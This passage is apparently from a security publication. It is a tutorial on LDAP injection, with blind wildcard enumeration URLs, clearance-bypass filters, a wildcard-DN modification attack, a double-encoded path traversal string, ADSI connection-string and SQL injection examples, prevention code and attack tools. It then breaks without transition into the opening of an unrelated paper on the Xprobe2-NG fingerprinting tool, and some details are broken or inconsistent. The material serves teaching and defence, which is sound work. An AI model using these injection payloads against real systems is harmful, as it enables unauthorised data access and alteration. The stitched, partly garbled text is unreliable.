
The following query is successful:

http://ribadeohacklab.com.ar/people_search.aspx?name=John)(zone=public)

Assuming that a 'John' is also part of a different zone,
we need to find enough characters to make a guess about
a zone name. The first thing to do is to try to guess the
first character of a different zone. Using the '*' wildcard,
one could check whether a zone begins with the character 'b':

http://ribadeohacklab.com.ar/people_search.aspx?name=Peter)(zone=b*)

This doesn't retrieve any results. After several
attempts, the following query:

http://ribadeohacklab.com.ar/people_search.aspx?name=Peter)(zone=m*)

shows the following results:

name: John
last name: Doe
address: Fake Street 123
telephone: 1234-12345

At this point there are several choices. One could
try to find the next character (like 'mo*'), check whether
a given vowel is present in the zone (like 'm*i*'), etc.
After some trial and error the desired result is achieved:

http://ribadeohacklab.com.ar/people_search.aspx?name=Peter)(zone=main)

It would be easy to use the value just found to gain
further insight into the information stored.

This technique may look like a brute force approach, but
the great advantage here is that every successful query
gives the attacker partial knowledge of the value string.
An automated attack would be able to guess values without
too much difficulty, and a clever attacker could minimize
the number of queries needed to find a given value. For
example, it would be possible to use a dictionary of words
from a particular domain (like people's names) to build a
decision tree and then use it to run a wordlist attack
using the wildcards.
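
The automated variant of this technique can be sketched as a prefix search driven by a yes/no oracle. Everything here is an assumption made for illustration: HIDDEN_ZONES simulates the directory, and oracle() stands in for one HTTP request whose answer is "did the page show any result". Python's fnmatch module is used only to imitate the '*' wildcard locally.

```python
import fnmatch
import string

# Hypothetical directory contents; a real attack would not know these.
HIDDEN_ZONES = ["public", "main"]


def oracle(pattern: str) -> bool:
    """Stand-in for one request: True if any zone matches the pattern."""
    return any(fnmatch.fnmatchcase(zone, pattern) for zone in HIDDEN_ZONES)


def enumerate_values(alphabet: str = string.ascii_lowercase, max_len: int = 16):
    """Depth-first prefix search: extend a prefix only while 'prefix*' matches."""
    found, stack, queries = [], [""], 0
    while stack:
        prefix = stack.pop()
        if prefix:
            queries += 1
            if oracle(prefix):            # exact value, no wildcard
                found.append(prefix)
        if len(prefix) >= max_len:
            continue
        for ch in alphabet:
            queries += 1
            if oracle(prefix + ch + "*"):  # e.g. zone=m*, then zone=ma*, ...
                stack.append(prefix + ch)
    return sorted(found), queries


if __name__ == "__main__":
    values, used = enumerate_values()
    print(values, "recovered with", used, "queries")
```

Each failed guess prunes a whole branch of candidate values, which is why the number of requests grows with the length of the value rather than with the size of the full key space.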

Privilege Escalation 

To clarify, a privilege escalation attack through LDAP
injection means here a change of privilege within the
authentication structure represented by a schema stored
in an LDAP database. In this particular case, the objects
should have some kind of property that determines the
access or security level required to work with them.

Take for example a product order repository located
on the 'Sales' server, where not all users are able
to see all the product orders. If the default query is:

(&(category=latest)(clearance=none))

only the following would be seen:

http://sales.ourdomain/orders.php?category=latest

Order A, Amount = 1000, Salesman = "John Doe"
Order C, Amount = 700, Salesman = "Jane Doe"
Order E, ...

Just by looking at the result set, it is plausible that
something may be missing. So finding a higher
'clearance' level (just by using a '*' wildcard or by
'Charset Reduction', see above) would be enough to access
the missing information.

In the current example, the higher clearance level
found is 'confidential', so if the application is vulnerable
to injection, it is easy enough to use it in order to
gain access to the remaining product orders.

Therefore:

http://sales.ourdomain/orders.php?category=latest)(clearance=confidential)

or

http://sales.ourdomain/orders.php?category=latest)(clearance=*)

show the following results:

Order A, Amount = 1000, Salesman = "John Doe"
Order C, Amount = 5000000, Salesman = "Joe Doakes"
Order B, Amount = 700, Salesman = "Jane Doe"
Order B, Amount = 1000000, Salesman = "Jannine Dee"
Order D, ...

Even with such a rough example the security risk of 
disclosing personal information of the top tier sales- 
men of this company is clear. 

Information Alteration 

LDAP not only allows performing search operations, 
but also adding, modifying and deleting information. 

It is not uncommon to find organizations with
different applications for managing directory data
without having to connect to the directory server.
These applications use APIs to interact via LDAP with
the information stored in the directory. If an application
takes user input from a form in order to alter some
information in the directory, the attacker may manipulate
this input to produce an unexpected result, such as
modifying or deleting more information than expected.

For example, PHP allows modifying data in a directory
simply by using an LDAP library function, ldap_modify() [8].
This function is defined as:

bool ldap_modify ( resource $li , string $dn , array $entry );

where $li represents an LDAP link identifier, returned
by the ldap_connect() function, $dn is the distinguished
name of the entry to be modified and $entry is the
information to be modified.

<?php
// $ldapconn is assumed to be a link identifier already
// obtained with ldap_connect() and bound with ldap_bind().
$attr["cn"] = "ToModify";
$dn = "uid=Ribadeo,ou=People,dc=foo";

$result = ldap_modify($ldapconn, $dn, $attr);

if (TRUE === $result) {
    echo "Entry was modified.";
}
else {
    echo "Entry could not be modified.";
}
?>

If the application receives $attr and $dn as parameters,
the attacker enters "uid=Ribadeo,ou=People,dc=*"
as the $dn value, and the input is not sanitized, all
CN entries under the branch will be modified with the
"ToModify" value.

The same attack technique can be used on any
function that receives the distinguished name as a
user-supplied value, such as the PHP functions
ldap_mod_replace(), ldap_mod_del() or ldap_delete().

URL encoding & Unicode encoding 

As with any other web application attack, one can
always try the injections using URL encoding [9][10]
and Unicode encoding [11]. Sometimes the web server
along with the web app may incorrectly interpret the
characters provided. For example, in a path traversal
attack some kind of encoding is frequently used. An
attacker will try to put "..\" in the URL to go to another
directory, and this may be achieved using valid and/or
invalid encoding like

http://example/..%255c..%255c..%255cboot.ini

The LDAP techniques mentioned here also rely heavily
on the treatment given to the user input. Even if the
application performs some kind of check against it, the
attacker may bypass the check by using some character
encoding and get what he/she is looking for.

With the LDAP search syntax in mind, we can always
try to use some kind of encoding on characters like
( ) & | ! = ~ * ' "
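
The double-encoding idea can be illustrated with Python's standard urllib.parse module. This is a minimal sketch: naive_check is a hypothetical input filter that only looks at the value after a single decoding pass, which is the kind of check a second layer of encoding may slip past.

```python
from urllib.parse import quote, unquote

# Characters with a special meaning in LDAP search filters (from the text).
SPECIALS = "()&|!=~*'\""


def encode(text: str, rounds: int = 1) -> str:
    """Percent-encode text; unreserved characters such as '~' are left as-is."""
    for _ in range(rounds):
        text = quote(text, safe="")
    return text


def naive_check(value: str) -> bool:
    """Hypothetical filter: accept if no special character is visible."""
    return not any(ch in SPECIALS for ch in value)


if __name__ == "__main__":
    payload = "test)(objectClass=*"
    double = encode(payload, rounds=2)
    seen_by_check = unquote(double)           # first decoding pass
    seen_by_ldap = unquote(seen_by_check)     # second decoding pass
    print(double)
    print(naive_check(seen_by_check), seen_by_ldap == payload)
```

If any component decodes the value again after the check, the original payload reappears, so validation has to be applied to the fully decoded value.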

LDAP Injection vs. SQL Injection 

Most applications nowadays use databases to store
information. IT professionals have a deep knowledge of
SQL, not only because it is commonly used but also because
SQL is a declarative programming language in which you
simply describe what the program should do but not how to
accomplish it. Although LDAP searches share the
characteristics of a declarative language, LDAP is not as
widely known by IT professionals as SQL is.

Sometimes, in order to avoid working with LDAP
searches directly, the query logic is delegated to a
relational model instead of using a directory. In
particular, Windows Active Directory can be queried using
SQL syntax through the Microsoft OLE DB Provider for
Microsoft Active Directory Service [12]. This gives ADO
applications the possibility to connect to heterogeneous
directory services through ADSI, by creating a read-only
connection to the directory service.

A common practice on Microsoft environments is to 
use this OLE DB Provider with SQL Server. In this case 
our application will be connecting to a SQL Server 
RDBMS and querying a relational model via SQL, but 
this relational structure will be obtaining its data from 
a Directory Service. In order to do so, a linked server 
against the AD server must be created. A linked server 
enables SQL Server to execute commands against 
OLE DB data sources on remote servers, without tak- 
ing into account the type of technology of the remote 
server (an OLE DB provider must be available). 

To create a linked server against the Windows 2000
Directory Service, the sp_addlinkedserver system stored
procedure has to be used with ADSDSOObject as the
'provider_name' parameter and adsdatasource as the
'data_source' parameter.

EXEC sp_addlinkedserver 'ADSI',
'Active Directory Services 2.5',
'ADSDSOObject', 'adsdatasource'

Once the linked server is configured, the directory
can be queried. The Microsoft OLE DB Provider for
Microsoft Directory Services supports two command
dialects, LDAP and SQL, to query the Directory Service.
The OPENQUERY function [13] can be used to send
a command to the Directory Service and consume its
results in a SELECT statement. It executes the specified
pass-through query on the given linked server, which is
an OLE DB data source. The OPENQUERY function can be
referenced in the FROM clause of a query as if it were a
table. For example:

SELECT [Name], SN [Last Name], ST State
FROM OPENQUERY(ADSI,
    'SELECT Name, SN, ST
     FROM ''LDAP://ADserver/OU=Sales,DC=sales,DC=ribadeohacklab,DC=com,DC=ar''
     WHERE objectCategory = ''Person'' AND
     objectClass = ''contact''')

A common practice is to create a view (a view is a 
virtual table that consists of columns from one or more 
tables which are the result of a stored select statement) 
based on the result of the select statement against the 
directory (via OPENQUERY), and then make our ap- 
plications query this view (via common SQL syntax) in 
order to validate data from the directory. 

This practice reduces our LDAP injection problem
to a SQL injection one. At this point, all the well-known
SQL injection and blind SQL injection techniques can be
applied. It is important to be aware of this when choosing
this kind of technology: an option selected for its ease
of use may introduce security risks.
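
The shift from LDAP injection to SQL injection can be illustrated without a directory at all. In the sketch below, an in-memory SQLite database stands in for the SQL Server view built on OPENQUERY; the table, view and column names are hypothetical, and the bound-parameter variant is shown only as the usual contrast to string concatenation.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE directory_snapshot (name TEXT, sn TEXT, zone TEXT);
    INSERT INTO directory_snapshot VALUES ('John', 'Doe', 'public');
    INSERT INTO directory_snapshot VALUES ('Jane', 'Roe', 'main');
    -- Stand-in for a view defined over the directory data.
    CREATE VIEW people AS SELECT name, sn, zone FROM directory_snapshot;
    """
)


def search_concatenated(name: str):
    # Vulnerable: the user input becomes part of the SQL text.
    sql = ("SELECT name, sn FROM people "
           "WHERE zone = 'public' AND name = '" + name + "'")
    return conn.execute(sql).fetchall()


def search_parameterized(name: str):
    # The input travels as a bound value and is never parsed as SQL.
    sql = "SELECT name, sn FROM people WHERE zone = 'public' AND name = ?"
    return conn.execute(sql, (name,)).fetchall()


if __name__ == "__main__":
    payload = "x' OR '1'='1"
    print(search_concatenated(payload))   # rows from every zone
    print(search_parameterized(payload))  # no rows
```

With the concatenated query the injected OR condition bypasses the zone restriction, exactly as a classic SQL injection would against any other table.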

Another common practice for connecting to an
Active Directory repository is to use the same OLE DB
provider for Active Directory Service [14], without the
SQL Server integration but with ADO objects [15]. The
Python sample code further below illustrates this.

In the code, the connection string and the final
query are created with some user input. This could
allow, for example, an alteration of the ADSI flags used
in the connection or some other type of connection
string attack [16].

If the password value entered was "s3cr3t;x" then
the final and effective connection string would be:

Provider=ADsDSOObject;User ID=someUser;Password=s3cr3t;
Encrypt Password=False;Extended Properties="xxx;Encrypt Password=True";
Mode=Read;Bind Flags=0;ADSIFlag=513
This means that the property located after the
password parameter was changed: it was moved to the
"Extended Properties" and a default value appeared in its
place. So, depending on the implemented code, one could
even change ADSI flags or add extended properties that
were not set by default.

The Python sample code for this ADO-based approach is:

    import win32com.client

    def ADQuery(user, passwd, filters):
        # some constants for ADSI flags
        ADS_SECURE_AUTHENTICATION = 0x1
        ADS_SERVER_BIND = 0x200

        objConn = win32com.client.Dispatch("ADODB.Connection")
        COMCmd = win32com.client.Dispatch("ADODB.Command")

        # Vulnerable: user input is concatenated into the connection string
        objConn.ConnectionString = "Provider=ADsDSOObject;User Id=" + \
            user + ";Password=" + passwd + \
            ";Encrypt Password=True;ADSI Flag=" + \
            str(ADS_SECURE_AUTHENTICATION + ADS_SERVER_BIND)
        objConn.Open()

        COMCmd.ActiveConnection = objConn
        COMCmd.Properties("Page Size").Value = 500
        COMCmd.Properties("Searchscope").Value = 2
        COMCmd.Properties("Timeout").Value = 10

        # Vulnerable: "filters" is interpolated into the query unvalidated
        COMCmd.CommandText = "SELECT displayName, sAMAccountName \
            FROM 'LDAP://SERVER/DC=DOMAINNAME' \
            WHERE objectCategory='%s'" % filters

        objRecordSet = COMCmd.Execute()[0]
        return objRecordSet

Most importantly, the final query can be changed
simply because the "filters" parameter is not validated.
Basically, this code converts an LDAP injection into a
SQL injection.

As previously mentioned, this provider allows the use of
both SQL syntax and the LDAP search syntax so,
depending on the application code, an attack using
any of the LDAP techniques mentioned before could
also be performed.

Something interesting about this provider is that,
since it has a particular syntax in which not only filters
but also attributes and search scope are specified in
the search string [15], an attacker may extend the
"information disclosure" technique.

Prevention Techniques 

LDAP injection is just another type of injection attack.
As we have already discussed in this article, these kinds
of attacks occur when an application (web or desktop)
sends user-supplied data to the LDAP interpreter inside
the filter options of the statement. When an attacker
supplies specially crafted data, the possibility to create,
read, delete or modify arbitrary data gets unlocked. The
most effective mitigation mechanism is to assume that all
user inputs are potentially malicious. Assuming that, the
following is clear: "user inputs must always be sanitized
on the server side (in order to avoid client side data
manipulation) before passing the parameter to the LDAP
interpreter".

This sanitizing procedure can be done in two different
ways. The easiest one consists of detecting a possible
injection attack by analyzing the parameter and looking
for certain known attack patterns, aided by different
programming techniques such as regular expressions. The
main disadvantage of this technique is Type I statistical
errors, also known as false positives. By applying this
mechanism we might be excluding valid user inputs,
mistaking them for invalid parameters.

A more sophisticated approach is to modify the received
user input so that it becomes harmless. Sanitizing the
input this way reduces the number of false positives.

In order to improve the effectiveness of this measure,
it is advisable to check the input twice, on both the
client and the server side. Checking the input format
on the client side improves application usability, because
the user gets a friendly message instead of explicit core
application errors. This first level of filtering should
cover the most common mistakes. However, server side
filtering or modification of user input is mandatory. At
this level, one has to make sure that the received
parameter has the structure it is supposed to have.
For example, if a user name is expected, it should only
contain alphanumeric characters and perhaps a few
special characters such as the underscore; it would
be really strange to find a bracket, an ampersand
or an equals sign. This can be checked by using a
regular expression like "^[A-Za-z0-9_-]+$". If we
are using PHP, code similar to the following can be used:

<?php
$username = $_GET['username'];
$UsrRegex = "/(^[A-Za-z0-9_-]+$)/";

// Build the filter only when the input matches the allow-list.
// $ds is assumed to be a link identifier from ldap_connect().
if (preg_match($UsrRegex, $username)) {
    $dn = "o=My Company, c=US";
    $filter = "(|(sn=$username*)(givenname=$username*))";
    $sr = ldap_search($ds, $dn, $filter);
}
else {
    print "Invalid UserName";
}
?>

As discussed in the "URL encoding & Unicode encoding"
section, any programmer must know that some type of
character encoding could be used in parameters, and this
has to be validated as well. For example, if the
application is using APIs like MultiByteToWideChar or
WideCharToMultiByte to translate Unicode characters, some
code review may be needed, since their incorrect usage
could also lead to security issues [17].

Another concept that must be taken into account
is the format of error messages. Errors should give the
attacker as little information as possible. This is
extremely important, because any conclusion attackers can
draw from error messages makes the attack easier. For
example, if the attacker sends an invalid input in a form
and gets back an error message returned by the server
after the execution, it is easy to realize that the LDAP
queries are executed without prior validation, which makes
the application a likely target for an exploit.

As a general conclusion, we can say the best way
to avoid this kind of injection attack is to always
mistrust the parameters obtained from user input and
always validate them before using them to build
a query.
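
As a complement to validation, the input-modification approach mentioned earlier in this section can be sketched as escaping the characters that have a special meaning inside a filter value. The escape sequences below follow the string representation of LDAP search filters in RFC 4515; the function name escape_filter_value is hypothetical, and the filter template is the one from the authentication example.

```python
# Escape sequences defined for filter values in RFC 4515.
_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Replace each special character with its backslash-hex escape.

    Working character by character avoids escaping the backslashes
    that the function itself has just produced.
    """
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_auth_filter(username: str, password: str) -> str:
    """Build the authentication filter from escaped values."""
    return "(&(Username={})(Password={}))".format(
        escape_filter_value(username), escape_filter_value(password)
    )


if __name__ == "__main__":
    print(build_auth_filter("user)(&))(", "zz"))
```

After escaping, the injected parentheses are treated as literal characters of the user name, so the structure of the filter no longer depends on the input.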

Tools 

As shown, there are different techniques, and trying
all of them by hand could be very time consuming.
Fortunately, there are some tools that automate LDAP
injection attacks and help you find vulnerabilities. This
article does not intend to list all of the existing tools,
so only some of them are briefly mentioned here.

W3AF 

This is a well known web attack and audit framework 
completely developed in Python. You can download it 
from http://w3af.sourceforge.net 

This framework has a plugin named LDAPi which
can perform LDAP injections against a web application.
By modifying the LDAPi.py plugin the user can
add new strings to test in the injection attack.

LDAP Injector 

This is a tool developed by Informatica64 which can
be downloaded from
http://www.informatica64.com/foca/download/ldapInjector_0_2_1_0.zip

The tool has a GUI that lets the user perform
dictionary based attacks, replacing values and analyzing
responses. It can also perform an attack by
reducing the valid charset and then applying boolean
analysis to find valid values.

This blog post (in Spanish) shows an example of
how to use the tool:
http://elladodelmal.blogspot.com/2009/04/ldap-injector.html

JBroFuzz 

This is a web app fuzzer you can download from
OWASP at http://www.owasp.org/index.php/Category:OWASP_JBroFuzz

This tool was developed in Java and has multiplatform
support. It has a GUI with different fuzzing options
and some graphing features to report results.

It has several fuzzers grouped by categories, and
there's one for LDAP injections.






Wapiti 

Wapiti is a command line web app vulnerability scan- 
ner also developed in Python. You can find it at 
http://wapiti.sourceforge.net 

It performs scans looking for scripts and forms 
where it can inject data. Once it gets this list, it acts 
like a fuzzer, injecting payloads to see if a script is 
vulnerable. There are some config files containing dif- 
ferent payloads that can be customized. 

wsScanner and Web2Fuzz 

wsScanner is a toolkit for Web Services scanning and
vulnerability detection, and Web2Fuzz is a web app
fuzzing tool; both were developed by Blueinfy Solutions.
You can obtain them from http://blueinfy.com/tools.html

These tools have a GUI and share some functionality.
They allow the user to define the fuzzing load to use
while scanning, which makes it possible to define custom
LDAP injection payloads and see the result.

The Web2Fuzz tool also lets the user choose different
character encoding options to apply to the payloads.

Wfuzz 

This tool is a web bruteforce scanner developed in
Python by Edge-Security. You can download it from
http://www.edge-security.com/wfuzz.php

It performs different kinds of injection attacks,
including some basic LDAP injection.

This application has some text files storing injection
attacks, and they can be customized by adding more
injection patterns.

Active operating system fingerprinting is the
process of actively determining a target network
system's underlying operating system type and
characteristics by probing the target system's network
stack with specifically crafted packets and analyzing
the received responses. Identifying the underlying
operating system of a network host is an important
capability that can be used to complement network
inventory processes, intrusion detection system discovery
mechanisms, security network scanners, vulnerability
analysis systems and other security tools that need to
evaluate vulnerabilities on remote network systems.

In recent years there have been a number of
publications featuring techniques that aim to confuse or
defeat remote network fingerprinting probes.

In this paper we present a new version of Xprobe2,
the network mapping and active operating system
fingerprinting tool, with an improved probing process
that deals with most of the defeating techniques
discussed in recent literature.

Keywords: network scanning, system fingerprinting, 
network discovery 

1.0 INTRODUCTION 

One of the effective techniques for analyzing intrusion
alerts from Intrusion Detection Systems (IDS) is
to reconstruct attacks based on attack prerequisites [8].
The success rate of exploiting many security
vulnerabilities depends heavily on the type and version of
the underlying software running on the attacked system,
which makes this information one of the basic components
of the attack prerequisites. When such information is not
directly available, the Intrusion Detection System
correlation engine, in order to verify whether an attack
was successful, needs to make an "educated guess" about
the possible type and version of the software used on the
attacked systems.

For example, if an Intrusion Detection System captured a
network payload and matched it to an exploit for a
Windows system vulnerability, the risk of the detected
attack would be high only if the target system exists,
is indeed running the Windows operating system and
exposes the vulnerable service.

In this paper we propose a new version of the
Xprobe2 tool [1] (named Xprobe2-NG) that is designed
to collect such information from remote network
systems without having any privileged access to
them. The original Xprobe2 tool was developed based
on a number of research works in the field of remote
network discovery [13, 12] and includes some advanced
features such as the use of normalized network packets
for system fingerprinting, a "fuzzy" signature matching
engine, a modular architecture with fingerprinting
plugins and so on.

The basic functionality principles of Xprobe2-NG are
similar to those of the earlier version of the tool:
Xprobe2-NG utilizes similar remote system software
fingerprinting techniques. However, the tool includes a
number of improvements to the signature engine and the
fuzzy signature matching process. Additionally, the
new version includes a number of significant
enhancements, such as the use of test information
gain weighting, originally proposed in [4]. The network
traffic overhead minimization algorithm uses the test
weights to re-order network probes and optimize the
module execution sequence. The new version of the
tool also includes modules to perform target
system probing at the application layer. This makes
the tool capable of successfully identifying the target
system even when protocol scrubbers (such as PF on an
OpenBSD system) are in front of the probed system
and normalize network packets [2, 5].

The use of Honeynet software (such as honeyd) is also
known to confuse remote network fingerprinting.
These Honeynet systems are typically configured
to mimic actual network systems and respond to
fingerprinting with packets that match certain OS
stack signatures [9]. Xprobe2-NG includes an analytical
module that attempts to detect and identify possible
Honeynet systems among the scanned hosts.

This paper's primary contribution is the introduction
of a remote network fingerprinting tool that uses both
network layer and application layer fingerprints to
collect target system information and is capable of
feeding such data (in the form of XML) to information
consumers (such as an Intrusion Detection System
correlation engine).

The rest of this paper is organized as follows: Section
2 introduces the basic concepts of network
fingerprinting, the problems that the tool has to deal
with these days, and the proposed solutions. Section
3 introduces the basic Xprobe2/Xprobe2-NG architecture.
Section 4 introduces the improvements that were
brought in with Xprobe2-NG. Section 5 demonstrates
some evaluation results, section 6 discusses possible
problems and section 7 concludes this work.

2.0 PRELIMINARIES 

Network Scanning is the process of sending one or
more network packets to a host or a network and,
based on the received response (or lack thereof),
determining whether the network or the host exists
within the target IP address range.

Remote Operating System Fingerprinting is the
process of identifying characteristics of the software
(such as operating system type, version, patch level,
installed software, and possibly more detailed
information) that runs on a remote computer system. This
can be done by analyzing network traffic to and from
the remote system, or by sending requests to the remote
system and analyzing the responses.

The passive analysis of network traffic is frequently
referred to in the literature as passive fingerprinting,
and the active probing of remote systems as active
fingerprinting.

Xprobe2-NG is a novel active remote operating
system fingerprinting tool that uses TCP/IP model
networking layer protocols and application layer requests
to identify the type and version of the operating system
software running on the target system.

With the introduction of application layer tests,
Xprobe2-NG aims at resolving the problems that
cannot be resolved by fingerprinting at the network layer.
In the remaining part of this section we discuss the
typical problems and issues that network layer operating
system fingerprinting tools have to deal with during the
scanning process.

2.1 Modern Fingerprinting Problems 

Honeypot systems, modified TCP/IP stack settings and 
network packet scrubbers are known to frequently 
confuse remote fingerprinting tools. Honeypot 
systems often respond as hosts or a group of hosts 
to remote fingerprinting tools. Modified TCP/IP stack 
responses are hard to fingerprint with strict signature 
matching. When packets traverse across the network, 
they can be modified by network traffic normaliz- 
ers. All of these factors affect the accuracy of the OS 
fingerprinting. 

Xprobe2-NG is aware of these problems and deals
with them by using fuzzy matching and mixed signatures
that probe the target system at different layers of
the OSI model network stack.

Moreover, the behavior of some routing and packet
filtering devices can itself be analyzed, and signatures
to identify and fingerprint intermediate nodes can
be constructed.

For example, the OpenBSD PF filter is known to return
different values in the TTL field when a system behind the
filter is accessed [6]. A signature can be constructed to
detect this behavior.

3.0 TOOL ARCHITECTURE OVERVIEW 

The Xprobe2-NG tool architecture includes several 
key components: core engine, signature matcher, and 
an extendable set of pluggable modules (also known 
as plugins). The core engine is responsible for basic 
data management, signature management, modules 
selection, module loading and probe execution. The 
signature matcher is responsible for result analysis. 
The plugins provide the tool with packet probes to be 
sent to the target systems and methods of analyzing 
and matching the received responses to the signature 
entries. 

The Xprobe2-NG modules are organized in several
groups: Network Discovery Modules, Service Mapping
Modules, Operating System Fingerprinting Modules
and Information Collection Modules.

Figure 1: Implementation Diagram

The general sequence of module execution is
shown in Figure 1. Each group of modules depends
on the successful execution of the preceding group,
therefore the groups of modules are executed
sequentially. However, each particular module within a
group may be executed in parallel with other modules
within the same group.

It is possible to control which modules, and in what 
sequence are to be executed, using command line 
switches. 
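
The execution model described above (groups run one after another, modules inside a group run side by side) can be sketched in Python with a thread pool. This is not the Xprobe2-NG implementation: the module functions, their return values and the rule that a group "succeeds" when at least one module returns a result are all assumptions made for the sake of illustration.

```python
from concurrent.futures import ThreadPoolExecutor


def run_groups(groups, target):
    """Run module groups sequentially; modules within a group concurrently.

    groups is an ordered list of (group_name, [callables]); each callable
    receives the target and the results gathered by earlier groups.
    """
    results = {}
    for name, modules in groups:
        with ThreadPoolExecutor(max_workers=max(1, len(modules))) as pool:
            outputs = list(pool.map(lambda m: m(target, results), modules))
        results[name] = outputs
        if not any(outputs):
            break  # assumed rule: later groups need this one to succeed
    return results


# Hypothetical modules used only to exercise the scheduler.
def icmp_ping(target, previous):
    return {"module": "icmp_ping", "alive": True}


def tcp_ping(target, previous):
    return {"module": "tcp_ping", "alive": True}


def os_test(target, previous):
    return {"module": "os_test", "ran_after": sorted(previous)}


if __name__ == "__main__":
    plan = [("discovery", [icmp_ping, tcp_ping]), ("fingerprinting", [os_test])]
    print(run_groups(plan, "192.0.2.1"))
```

The address 192.0.2.1 belongs to a documentation-only range, so the example never refers to a real host.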

3.1 Network Discovery Modules 

Xprobe2 discovery modules are designed to perform
host probing and firewall detection, and to provide
information for the automatic receive-timeout calculation
mechanism. Xprobe2-NG comes with a new module
that uses the SCTP protocol for remote system probing.

The aim of all network discovery modules is to elicit
a response from a targeted host: either a SYN-ACK or
a RST in response to the TCP ping discovery module,
an ICMP Port Unreachable in response to the
UDP ping discovery module, or an SCTP response for the
SCTP ping module. The round trip time, which can be
calculated for any successful run of a discovery
module, is remembered by the module executor and is
further used by the receive-timeout calculation mechanism.
This mechanism is used at a later stage of the scan to
estimate the actual target system response time and to
identify silently dropped packets without having to wait
longer than necessary.

3.2 OS Fingerprinting Modules 

The Operating System Fingerprinting Modules in 
Xprobe2-NG include both network layer fingerprint- 
ing modules that operate with network packets and 
application layer fingerprinting modules that operate 
with application requests. 

The OS fingerprinting modules provide a set of tests
for a target (with the possible results stored in
signature files) to determine the target operating
system and architecture details from the received
responses.

The execution sequence and the number of operating
system fingerprinting modules executed can be
controlled manually or selected automatically, based
on the information discovered by the network discovery
modules or provided through command line switches.

3.3 Fuzzy Signature Matching Mechanism 

The Xprobe2 tool stores OS stack fingerprints in the
form of signatures for each operating system. Each
signature contains data regarding the issued tests and
the possible responses that may identify the
underlying software of the target system.

Xprobe2/Xprobe2-NG signatures are presented in a
human-readable format and are easily extendable.
Moreover, signatures for different hosts may have a
variable number of signature items (signatures for
different tests) within the signature entry. This
allows the tool to maintain as much information as
possible on different target platforms without the
need to re-test the whole signature set against the
full set of fingerprinting modules every time the
system is extended with new fingerprinting modules.

The following example shows the Xprobe2-NG signature
for the Apple Mac OS operating system, with an
application layer signature entry for the SNMP
protocol.

fingerprint {

    OS_ID = "Apple Mac OS X 10.2.3"
    icmp_echo_reply = y
    icmp_echo_code = !0

    snmp_sysdescr = Darwin Kernel Version

    http_caseinsensitive = y

}

The signature contains key-value pairs: each key names
a fingerprinting test and each value gives the
matching result. The keywords are defined by each
module separately and registered with the Xprobe2
signature parser at run time.
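
To make the key-value structure concrete, here is a
minimal Python sketch that reads entries in the format
shown above into dictionaries. It is not the Xprobe2
signature parser; the function name and the handling
of quotes are assumptions, and per-module keyword
registration is left out.

```python
def parse_fingerprints(text):
    """Parse 'fingerprint { key = value ... }' blocks into a list of dicts."""
    entries = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("fingerprint") and line.endswith("{"):
            current = {}                      # start of a new signature entry
        elif line == "}" and current is not None:
            entries.append(current)           # end of the entry
            current = None
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            current[key.strip()] = value.strip().strip('"')
    return entries
```

Because every entry is just a dictionary, a signature
may carry any subset of test keys, which matches the
variable number of signature items described earlier.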

Xprobe2 was the first remote OS fingerprinting tool to
introduce a "fuzzy" matching algorithm for the remote
operating system fingerprinting process. Fuzzy
matching limits the impact on fingerprinting accuracy
of failed tests and of tests confused by modified
TCP/IP stacks and network protocol scrubbers. Thus, if
no full signature match is found in the target system
responses, Xprobe2 provides a best-effort match
between the results received from fingerprinting
probes against the targeted system and the signature
database. The details of the Xprobe2 "fuzzy" matching
algorithm can be found in our earlier publication [1].

In Xprobe2-NG the "fuzzy" matching algorithm is
updated so that module weights and reliability metrics
are used in the final score calculation. The original
algorithm for module weight calculation is proposed in [4].
Reliability metric is a floating point value in range 1 , 
which can be optionally included as part of signature 
for each test. 
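
The exact scoring formula is given in the cited
publications rather than here, so the following Python
sketch is only one plausible reading of "module
weights and reliability metrics are used in final
score calculation". The normalisation and the rule
that unanswered tests are skipped are assumptions.

```python
def fuzzy_score(observed, signature, weights, reliability=None):
    """Score how well observed test results fit one signature (0.0 to 1.0).

    observed:    {test_key: result} for tests that produced a result
    signature:   {test_key: expected_result} taken from a signature entry
    weights:     {test_key: module weight}, default 1.0 (assumed)
    reliability: {test_key: reliability metric}, default 1.0 (assumed)
    """
    reliability = reliability or {}
    total = 0.0
    matched = 0.0
    for test, expected in signature.items():
        if test not in observed:
            continue  # failed or skipped tests do not count against the signature
        w = weights.get(test, 1.0) * reliability.get(test, 1.0)
        total += w
        if observed[test] == expected:
            matched += w
    return matched / total if total else 0.0
```

The signature with the highest score would then be
reported as the best-effort match.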

4.0 TOOL IMPROVEMENTS 

4.1 Application Layer Signatures 

Some TCP/IP network stacks may be modified
deliberately to confuse remote operating system
fingerprinting attempts. In other cases a network
system may simply forward a TCP port of an
application. A modern OS fingerprinting tool has to be
able to deal with such systems and, where possible,
identify the fact of OS stack modification or port
forwarding. Xprobe2-NG does so by using additional
application layer tests to differentiate between
classes of operating systems. Application layer
fingerprinting methods are known to be effective [2],
and it is much harder to emulate application layer
responses to match the signatures of a particular
operating system. Application layer responses are not
modified by network protocol scrubbers and thus may
provide more accurate information. We do not claim
that it is impossible to alter system responses at the
application layer; we simply point out that there is
less motivation to do so, as this is a much more
complex task with a higher risk of causing system
instability or introducing security vulnerabilities in
the application.

Applications running on different operating systems
may respond differently to certain types of requests.
This behavior is dictated by operating system
limitations or by differences in the design of
underlying operating system components. A simple
'directory separator' test checks how the target
system handles '/' and '\' type requests. The
application will respond differently under Windows and
Unix because of the difference in filesystem
implementation. Modifying application layer responses
to mimic another type of operating system is not an
easy task. For example, normalization of responses to
"..\..\" requests on a web server running on top of
the OS/2 platform may "unplug" a security hole on this
operating system [7].

Xprobe2-NG uses application layer modules in order to
detect and correct possible fingerprinting mistakes
made at the network layer. These modules can also
collect additional information on the target host. In
addition, the new version of Xprobe2-NG comes with a
module that attempts to detect honeyd instances and
other "honeypot" systems by generating known-to-be
valid and invalid application requests and validating
the responses. The variable parts of these requests,
such as filenames and usernames, are randomly
generated to make it harder to create "fake" services
without fully implementing the application or
protocol. Inconsistencies in the received application
responses are considered signs of a possible honeypot
system.

Furthermore, inconsistency between the results
returned by application layer tests and network layer
tests may signify the presence of a honeypot system, a
network layer packet normalizer or a system running
static port address translated (PAT) services.
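
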